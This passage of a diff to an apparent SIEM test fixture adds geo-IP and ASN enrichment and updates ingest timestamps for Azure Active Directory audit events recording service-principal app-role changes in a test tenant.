APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -1647,6 +1755,18 @@
 },
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "ip": "67.43.156.15"
 },
 "tags": [
@@ -1813,7 +1933,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124879300Z", + "ingested": "2021-12-14T14:48:43.176640683Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -1840,6 +1960,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2006,7 +2138,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124885800Z", + "ingested": "2021-12-14T14:48:43.176641310Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2033,6 +2165,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2199,7 +2343,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124892700Z", + "ingested": "2021-12-14T14:48:43.176642230Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372061\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"02868191-019a-453a-a3a9-a21f44898778\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -2226,6 +2370,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -2392,7 +2548,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124899400Z", + "ingested": "2021-12-14T14:48:43.176642972Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:47\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
